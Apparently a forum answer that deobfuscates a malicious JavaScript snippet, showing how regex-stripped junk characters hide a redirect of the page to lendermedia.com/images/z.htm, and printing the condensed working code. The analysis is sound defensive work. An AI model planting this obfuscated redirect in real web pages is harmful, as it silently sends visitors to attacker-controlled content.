It will redirect the URL: http://lendermedia.com/images/z.htm '(follow it at your own risk).
Copy and paste the code into a decent JavaScript editor and format its source.
Key points:
var h = 'hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');
h will be equal to ' http://lendermedia.com/images/z.htm '
t = document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];
t will contain a link to document.location
b['hIrBeTf.'.replace(/[\.BTAI]/g, '')] = h;
A property named href of b , which at this point (inside another function) really is t from the above statement, has the value h , which is the URL.
Most of the code is simple noise, the actual functionality consists of this:
function uK() { }; uK.prototype = { f : function() { var h = 'hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^' .replace(/[\^H\!9X]/g, ''); t = document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')]; function x(b) { b['hIrBeTf.'.replace(/[\.BTAI]/g, '')] = h; } x(t); } }; var tL = new uK(); tL.f();
Lauri lehtinen
source share